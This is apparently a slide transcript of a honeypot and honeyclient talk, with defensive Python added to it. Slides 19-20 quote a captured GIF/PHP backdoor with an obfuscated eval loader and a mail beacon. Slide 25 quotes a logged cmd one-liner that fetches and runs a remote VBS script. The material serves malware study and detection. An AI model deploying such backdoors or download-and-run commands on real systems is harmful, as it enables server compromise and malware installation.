
Deception, Honeypots and Honeyclients


Slightly redacted version of my deception talk.

Johnny Vestergaard

May 06, 2014


Transcript

  1. [agenda] • Introduction • The problem? • The opponent. • Honeypots. • Honeyclients. • Sandboxing.
  2. [the speaker] • Software engineer • Former military intelligence analyst within Electronic Warfare • The Honeynet Project. • linkedin.com/in/johnnykv • github.com/johnnykv
  3. [disclaimer] The views and opinions expressed in this presentation are the personal views of the speaker and do not necessarily reflect the views, policies or procedures of present or past employers. All information, tactics, techniques and procedures used or mentioned during this presentation are based solely on open and publicly accessible sources.
  4. [the honeynet project] The Honeynet Project is a leading international 501c3 non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security.
  5. [analyst mindset] • respect your opponent. • feelings make a bad analyst. • ... "to know your enemy you must become your enemy".
  6. [blue team] • limited funds. • static infrastructure. • wide attack surface. • limited knowledge about the opponent.
  7. [red team] • picks time and place. • knows the target. • not limited by the law. • low grade tools available online.
  8. [the numbers] • In 80% of all data breaches it took attackers less than 24 hours to compromise. • In 75% of all data breaches it took longer than 24 hours for the blue team to detect the attack. Source: Verizon 2014 Data Breach Investigations Report (DBIR)
  9. [the numbers] • 80% of all detections were made by external parties. Source: Verizon 2014 Data Breach Investigations Report (DBIR)
  10. [OODA] Observe (banner grabbing) -> Orient (study result, COA) -> Decide (choose COA) -> Act (exploitation). • Firewalls / IDS
  11. [the art of deception] "Thus the expert in battle moves the enemy, and is not moved by him." Sun Tzu, old guy
  12. [definition] "A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource." Lance Spitzner
  13. [ENISA taxonomy] Excerpt from the report: "... somewhat similar to our distinction between high- and low-interaction ones. 3.4 Our taxonomy. For the purposes of this document, we expand the basic taxonomy described in section 3.2. Definitions of criteria (classes) and their particular values are still valid, but we will add an extra class and values in order to improve the research and presentation of its results. Figure 2: Graphical representation of the classification scheme of taxonomy used in the report." Source: Proactive Detection of Security Incidents (ENISA 2012)
  14. [advantages] • Early detection. • Taking control. • OODA: the possibility for you to Observe! • Know your enemy… • Unaffected by encryption. • Low rate of false positives.
  15. [disadvantages] • Only useful if the opponent actually observes the honeypot. • Honeypot amplification. • The law.
  16. [kippo] • Secure Shell (SSH). • Low interaction. • Easily deployable. • Developed by Upi Tamminen. • https://code.google.com/p/kippo/
  17. [kippo analysis] • Analysis by Jose Nazario • http://monkey.org/~jose/honeynet/kippo/ • Analysis by Andrea De Pasquale • http://bl.ocks.org/adepasquale/raw/6571226/
  18. [glastopf] • Web app honeypot. • Emulation of SQLi, LFI, RFI, etc. • Give the adversary what he wants. • Targets tools, not humans. • Dork bootstrapping of virgin instances. • Lead developer: Lukas Rist. • https://github.com/glastopf/glastopf
  19. [glastopf extraction] MD5: 6756481b836d968f6ca9291cc5f7ce68
      (binary bytes) GIF89a (binary GIF header bytes) <?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc']; if (isset($lol)) { eval(gzinflate(base64_decode('tZFPS8MwGMbvg32HLAyawiwqnqxKj x68iFchdNmbNdomJW+KHbLvbtI/1uLAXbwkJM/z/ p4nBERhCH3MxbvS +4uX56e7rX2g6XIBnYAHvKVJXdS80XkFLE7oaJCNFk4ZTaBlayEhJp/ LBSFrC0juSRSl4aQkYSuoanfoPYMpCGwEcGgVOmQRtCCiyUJIFm66 wU3AxukoDCFvRmlGXzWdycd +gxLhVAoWUJb8V9aAzCa5b3wm9IAOqnl5s +XocuvY1DvrfTPyFO0H9uC4MNqB9tQfc14CveOihFyzMzvVOaIrbPN 3q9H5L70yhdyDTGMFsLUMwNrUoPt/pZbGJ76B0u +Mj0KVwFaZBCP9fDD3rsSTpIV85283V5fXN3E6Roc3
  20. [glastopf extraction] MD5: 6756481b836d968f6ca9291cc5f7ce68
      ?><? $time_shell = "".date("d/m/Y - H:i:s")."";
      $ip_remote = $_SERVER["REMOTE_ADDR"];
      $from_shellcode ='.gethostbyname($_SERVER['SERVER_NAME']).';
      $to_email = '[email protected]';
      $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ". $_SERVER['HTTP_HOST']."";
      $linkcr = "Backdoor PHP Injection : ".$_SERVER['SERVER_NAME']."". $_SERVER['REQUEST_URI']." - IP Pengguna : $ip_remote - Time: $time_shell";
      $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
      @mail($to_email, $server_mail, $linkcr, $header); ?><?
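The capture above pairs a GIF header with a PHP loader so the file passes as an image while still executing on a PHP host, and then mails its own location home. As an added illustration (not code from the talk or from glastopf), this Python scanner checks an uploaded file body the way a defender would: image magic followed by a PHP open tag, the eval(gzinflate(base64_decode(...))) loader, and the mail() call-home. The sample bytes are constructed and the base64 payload is a placeholder, not the original capture.

```python
import hashlib
import re

# Constructed sample modelled on the glastopf capture: a minimal GIF89a header
# followed by a PHP loader and a mail() beacon. The base64 string is a placeholder.
SAMPLE_POLYGLOT = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
    b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
    b"<?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; "
    b"if (isset($lol)) { eval(gzinflate(base64_decode('PLACEHOLDER_BASE64'))); } "
    b"@mail($to_email, $server_mail, $linkcr, $header); ?>"
)

# Magic bytes of the image types an upload form would normally accept.
IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif",
               b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg"}

# The obfuscated loader seen in the capture, and a mail() call used as a beacon.
LOADER_RE = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
BEACON_RE = re.compile(rb"(?<![A-Za-z0-9_])@?mail\s*\(", re.I)


def scan_upload(data: bytes) -> dict:
    """Return the findings for one file body: image type, PHP offset, loader, beacon."""
    image_type = next((t for magic, t in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    php_offset = data.find(b"<?php")
    if php_offset < 0:
        php_offset = data.find(b"<?")  # short open tag, also used in the capture
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "image_type": image_type,
        "php_offset": php_offset if php_offset >= 0 else None,
        # An image header with PHP code after it is the polyglot trick itself.
        "polyglot": image_type is not None and php_offset > 0,
        "obfuscated_loader": bool(LOADER_RE.search(data)),
        "mail_beacon": bool(BEACON_RE.search(data)),
    }


def verdict(findings: dict) -> str:
    """Polyglot or obfuscated loader: reject. Bare PHP where an image was expected: review."""
    if findings["polyglot"] or findings["obfuscated_loader"]:
        return "reject"
    if findings["php_offset"] is not None and findings["image_type"] is None:
        return "review"
    return "accept"


if __name__ == "__main__":
    result = scan_upload(SAMPLE_POLYGLOT)
    print(result, verdict(result))
```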
  21. [conpot] • ICS/PLC/SCADA honeypot. • Modbus, HTTP, SNMP, S7Comm • Everything industrial • Exports to STIX/TAXII • Lead developer: Lukas Rist.
  22. [nova] • Easy configuration and deployment • Based on Honeyd. • Included in ADHD (Active Defence Harbinger Distribution). • Also comes as a hardware appliance. • Very low interaction.
  23. [beeswarm] • Make honeypot technology easily available. • Active honeypots with bait traffic. • GSoC 2013, Aniket Panse. • https://github.com/honeynet/beeswarm • Version 1.0 July 2014… Hopefully… • Lead developer: Johnny Vestergaard.
  24. [thug] • Browser emulation • Just as the attacker expects it (!). • Lead developer: Angelo Dell'Aera. • http://buffer.github.io/thug/doc/index.html
  25. [thug]
      ~/thug/src $ python thug.py "http://[omitted]/main.php?page=8c6c59becaa0da07"
      <snip>
      * Saving applet Ryp.jar
      * ActiveXObject: msxml2.xmlhttp
      * ActiveXObject: acropdf.pdf
      <snip>
      * [Windows Script Host Run - Stage 1] Code:
      cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://[omitted]/data/hcp_vbs.php?f=b081d&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
      * [Windows Script Host Run - Stage 1] Downloading from URL http://[omitted]/data/hcp_vbs.php?f=b081d&d=0
      * [HTTP] URL: http://[omitted]/data/hcp_vbs.php?f=b081d&d=0 (Status: 200, Referrer: http://[omitted]/main.php?page=8c6c59becaa0da07)
      * [Windows Script Host Run - Stage 2] Downloading from URL http://[omitted]/w.php?e=5&f=b081d
      * [HTTP] URL: http://[omitted]/w.php?e=5&f=b081d
      * [Windows Script Host Run - Stage 2] Saving file d328b5a123bce1c0d20d763ad745303a
      <snip>
      * [Navigator URL Translation] data/field.swf --> http://[omitted]/data/field.swf
      * [HTTP] URL: http://[omitted]/data/field.swf
      <snip>
      * Saving remote content at data/field.swf (MD5: 502da89357ca5d7c85dc7a67f8977b21)
      * Saving log analysis at ../logs/baa880d8d79c3488f2c0557be24cca6b/20120702191511
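To turn a thug run like the one above into something an analyst can act on, here is an added Python parser (not part of thug or of the talk) that pulls the ActiveX probes, the Windows Script Host stages, the fetched URLs and the hashes of saved files out of the log, then deduplicates them into indicators. The log excerpt is constructed from the lines shown on the slide, with hosts left as [omitted].

```python
import re

# Constructed thug log excerpt modelled on the run shown on the slide (sample input,
# not a live capture; hosts are left as [omitted] exactly as on the slide).
SAMPLE_LOG = """\
* Saving applet Ryp.jar
* ActiveXObject: msxml2.xmlhttp
* ActiveXObject: acropdf.pdf
* [Windows Script Host Run - Stage 1] Downloading from URL http://[omitted]/data/hcp_vbs.php?f=b081d&d=0
* [HTTP] URL: http://[omitted]/data/hcp_vbs.php?f=b081d&d=0 (Status: 200, Referrer: http://[omitted]/main.php?page=8c6c59becaa0da07)
* [Windows Script Host Run - Stage 2] Downloading from URL http://[omitted]/w.php?e=5&f=b081d
* [HTTP] URL: http://[omitted]/w.php?e=5&f=b081d
* [Windows Script Host Run - Stage 2] Saving file d328b5a123bce1c0d20d763ad745303a
* [Navigator URL Translation] data/field.swf --> http://[omitted]/data/field.swf
* [HTTP] URL: http://[omitted]/data/field.swf
* Saving remote content at data/field.swf (MD5: 502da89357ca5d7c85dc7a67f8977b21)
"""

# One pattern per line type the analyst cares about.
ACTIVEX_RE = re.compile(r"^\* ActiveXObject: (\S+)$")
APPLET_RE = re.compile(r"^\* Saving applet (\S+)$")
STAGE_RE = re.compile(r"^\* \[Windows Script Host Run - Stage (\d+)\] Downloading from URL (\S+)$")
SAVEFILE_RE = re.compile(r"^\* \[Windows Script Host Run - Stage (\d+)\] Saving file ([0-9a-f]{32})$")
HTTP_RE = re.compile(r"^\* \[HTTP\] URL: (\S+)")
CONTENT_RE = re.compile(r"^\* Saving remote content at (\S+) \(MD5: ([0-9a-f]{32})\)$")


def parse_thug_log(text: str) -> dict:
    """Walk the log line by line and collect what the emulated browser was made to do."""
    report = {"activex": [], "applets": [], "stages": [], "urls": [], "files": []}
    for line in text.splitlines():
        line = line.strip()
        if m := ACTIVEX_RE.match(line):
            report["activex"].append(m.group(1))
        elif m := APPLET_RE.match(line):
            report["applets"].append(m.group(1))
        elif m := STAGE_RE.match(line):
            report["stages"].append((int(m.group(1)), m.group(2)))
        elif m := SAVEFILE_RE.match(line):  # stage payload saved under its own MD5
            report["files"].append((f"stage{m.group(1)}", m.group(2)))
        elif m := HTTP_RE.match(line):
            report["urls"].append(m.group(1))
        elif m := CONTENT_RE.match(line):
            report["files"].append((m.group(1), m.group(2)))
    return report


def indicators(report: dict) -> dict:
    """Deduplicated URLs and MD5s (stage URLs also appear as [HTTP] lines), ready for a hunt."""
    urls = {u for _, u in report["stages"]} | set(report["urls"])
    return {"urls": sorted(urls), "md5": sorted({h for _, h in report["files"]})}
```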
  26. [cuckoo sandbox] • Execution of files in a protected environment. • Forensic dump. • API calls, files, memory, pcap, etc. • http://www.cuckoosandbox.org/ • https://malwr.com/analysis/NmY4MmY2MTAzMzlhNGJhZmFhMDEzNGZlYTk4YWFkZmI/
  27. [more information] • ENISA honeypot study. • The Honeynet Project. • 2014 Workshop: Warszawa. • Books and spooky army manuals • [email protected]